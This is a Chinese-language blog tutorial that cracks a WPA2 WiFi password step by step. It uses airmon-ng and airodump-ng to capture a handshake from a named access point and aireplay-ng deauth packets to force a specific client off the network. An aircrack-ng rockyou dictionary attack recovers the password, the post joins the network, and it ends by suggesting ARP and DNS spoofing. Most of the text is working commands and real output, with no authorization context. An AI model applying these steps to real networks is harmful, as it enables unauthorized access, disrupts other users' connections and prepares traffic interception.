admin管理员组

文章数量:1540705

文章目录

    • 打开网卡监听模式
      • 监听设置结果
    • 扫描wifi
    • 开启数据抓包
      • 强制用户断开wifi连接
    • 密码字典
    • 暴力破解
    • 后续
      • wifi连接测试
    • networkmanager冲突
    • 连接配置文件详解参照
    • 成功连接wifi后

打开网卡监听模式

打开终端,用 airmon-ng 命令查看

root@kali:~/capture# airmon-ng

PHY	Interface	Driver		Chipset

phy1	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

root@kali:~/capture# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    702 NetworkManager
    949 wpa_supplicant

PHY	Interface	Driver		Chipset

phy1	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

		(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
		(mac80211 station mode vif disabled for [phy1]wlan0)

监听设置结果

输入 iwconfig 命令查看网卡信息, wlan0mon 网卡名加了 mon 则表示成功

root@kali:~/capture# ifconfig
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 00-0F-02-29-98-3D-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 262  bytes 59606 (58.2 KiB)
        RX errors 0  dropped 262  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

扫描wifi

命令 airodump-ng wlan0mon,开始扫描 WiFi,按 ctrl+c 结束任务

root@kali:~/Downloads# airodump-ng wlan0mon
 CH  3 ][ Elapsed: 1 min ][ 2019-11-15 18:09                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 06:05:88:09:5E:89  -44       35        0    0  11  130  OPN              EWEB_WiFi                                         
 FC:53:9E:BA:BC:27  -45       55        1    0   6  180  WPA2 CCMP   PSK  MEIZU E3                                          
 06:05:88:09:5E:75  -46       39        0    0   6  130  OPN              EWEB_WiFi                                         
 06:05:88:09:5E:91  -50       37        0    0  11  130  OPN              EWEB_WiFi                                         
 F0:C8:50:53:DB:70  -50       46        0    0  11   65  WPA2 CCMP   PSK  shuaibi                                           
 06:05:88:09:5E:A9  -53       40        3    0   1  130  OPN              EWEB_WiFi                                         
 24:69:68:CE:18:7A  -54       28       17    0   1  405  WPA2 CCMP   PSK  TP-LINK_505                                       
 06:05:88:09:5E:79  -55       22        0    0   1  130  OPN              EWEB_WiFi                                         
 36:69:68:CE:18:7A  -56       29        0    0   1  405  WPA2 CCMP   PSK  TPGuest_187A                                       
 06:05:88:09:5E:7D  -57       35        0    0  11  130  OPN              EWEB_WiFi

BSSID 为 wifi 的 MAC 地址,PWR 为信号强弱程度 ,#DATA 为数据量,越大使用的人就越多,CH 为信道频率(频道),ESSID 为 wifi 的名称,中文可能会有乱码

开启数据抓包

接着输入 airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

airodump-ng --bssid F0:C8:50:53:DB:70 -c 11 -w /home/wifi wlan0mon

选取对象:F0:C8:50:53:DB:70 -50 46 0 0 11 65 WPA2 CCMP PSK shuaibi

root@kali:~# airodump-ng -c 11 --bssid F0:C8:50:53:DB:70 -w ~/capture/ wlan0mon
 CH 11 ][ Elapsed: 1 min ][ 2019-11-15 18:38 ][ WPA handshake: F0:C8:50:53:DB:70                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 F0:C8:50:53:DB:70  -47  89      638       64    0  11   65  WPA2 CCMP   PSK  shuaibi                    
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
 F0:C8:50:53:DB:70  00:5B:94:A0:B4:03  -56    1e- 1      0     2671

STATION: 该AP下的连接站
此处已经获取握手包

CH 11 ][ Elapsed: 1 min ][ 2019-11-15 18:38 ] [WPA handshake: F0:C8:50:53:DB:70

数据包已经正在抓取

强制用户断开wifi连接

原理:给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

键入 airepaly-ng -0 0 -c 连接到 WiFi 的手机 mac 地址 -a bssid 网卡名(一般为 wlan0mon)
aireplay-ng -0 10 -a F0:C8:50:53:DB:70 -c 00:5B:94:A0:B4:03 wlan0mon

root@kali:~/Downloads# aireplay-ng -0 10 -a F0:C8:50:53:DB:70 -c 00:5B:94:A0:B4:03 wlan0mon
18:37:58  Waiting for beacon frame (BSSID: F0:C8:50:53:DB:70) on channel 11
18:37:59  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 3|56 ACKs]
18:37:59  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 1|57 ACKs]
18:38:00  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|55 ACKs]
18:38:00  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 2|57 ACKs]
18:38:01  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|60 ACKs]
18:38:01  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|58 ACKs]
18:38:02  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|58 ACKs]
18:38:03  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|59 ACKs]
18:38:03  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 1|54 ACKs]
18:38:04  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 1|57 ACKs]

(0 WiFi 设备无限次数,-0 10 则攻击 10 次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送 tcp 包(里面包含加密的密码数据),我方伪装成 WiFi 热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的 WiFi 密码,数据包里面的密码是哈希加密的,哈希加密只能正向)

cd 打开抓包的目录,ls 列出来,就看到我们抓到的数据包

root@kali:~# ll  capture/
-rw-r--r--  1 root root 1005912 11月 15 18:38 -01.cap            #握手包
-rw-r--r--  1 root root     477 11月 15 18:38 -01.csv            #ap与连接点信息
-rw-r--r--  1 root root     587 11月 15 18:38 -01.kismet.csv     # csv格式显示ap站点信息
-rw-r--r--  1 root root    2756 11月 15 18:38 -01.kismetxml  # 同-01.kismet.csv
-rw-r--r--  1 root root  402226 11月 15 18:38 -01.log.csv        # log

密码字典

  • 解压 kali 自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz
gzip -d/usr/share/wordlists/rockyou.txt.gz

暴力破解

键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt ~/capture/-01.cap

])

“此处破解wifi密码并非自己设置,实属不易!”)
耐心等待密码破解吧…

特别说明:暴力破解并不简单,需要足够强大的字典和时间,可以通过字典生成工具生成自己的字典,字典越强大越容易破解。。哈哈,也是需要点运气的!

后续

关闭监听模式

root@kali:/usr/shellare/wordlists# airmon-ng stop wlan0mon
PHY	Interface	Driver		Chipset
phy1	wlan0mon	rt2800usb	Ralink Technology, Corp. RT2870/RT3070
		(mac80211 station mode vif enabled on [phy1]wlan0)
		(mac80211 monitor mode vif disabled for [phy1]wlan0mon)
root@kali:/usr/shellare/wordlists# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:0f:02:29:98:3e  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wifi连接测试

root@kali:~# iw dev wlan0 scan ssid shuaibi | grep SSID
	SSID: EWEB_WiFi
	SSID: 206
	SSID: EWEB_WiFi
	SSID: \xe2\x88\x9e
	SSID: shuaibi
root@kali:~# wpa_passphrase "shuaibi" "12345678" | tee Documents/read/wifi暴力破解测试/shuaibi.wifi.conf
network={
	ssid="shuaibi"
	#psk="12345678"
	psk=756c48293ab614daedef5bae261bf6001dca127fecbd44dfa9cc3066a2d8ce43
}
root@kali:~# wpa_supplicant -B -iwlan0 -c Documents/read/wifi暴力破解测试/shuaibi.wifi.conf && dhclient wlan0
Successfully initialized wpa_supplicant
RTNETLINK answers: File exists
root@kali:~# iw dev
phy#1
	Interface wlan0
		ifindex 6
		wdev 0x100000003
		addr 00:0f:02:29:98:3e
		ssid shuaibi
		type managed
		channel 11 (2462 MHz), width: 20 MHz, center1: 2462 MHz
		txpower 20.00 dBm

networkmanager冲突

使用命令行直接连接或者使用/etc/net/interfaces文件对ip等进行配置后可能会使networkmanager服务无法正常显示

参考 启用关闭networkmanager

service network-manager stop # 停止 nm服务
rm /var/lib/NetworkManager/NetworkManager.state # 移除nm 的状态文件
gedit /etc/NetworkManager/nm-system-settings.conf # 打开nm 的配置文件

##里面有一行:managed=true
## 如果你手工改过/etc/network/interfaces,nm会自己把这行改成:managed=false
## 将false 修改成true

service network-manager start

连接配置文件详解参照

/usr/share/doc/wpasupplicant/examples/wpa_supplicant.conf

成功连接wifi后

使用arp欺骗,dns欺骗进行更深一步的操作

apt-get install dsniff ssldump             # 安装arpspoof...
echo 1 > /proc/sys/net/ipv4/ip_forward     # 开启端口转发

本文标签: 暴力密码wifi

版权声明:本文标题:暴力破解wifi密码尝试 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1727035495a1095012.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。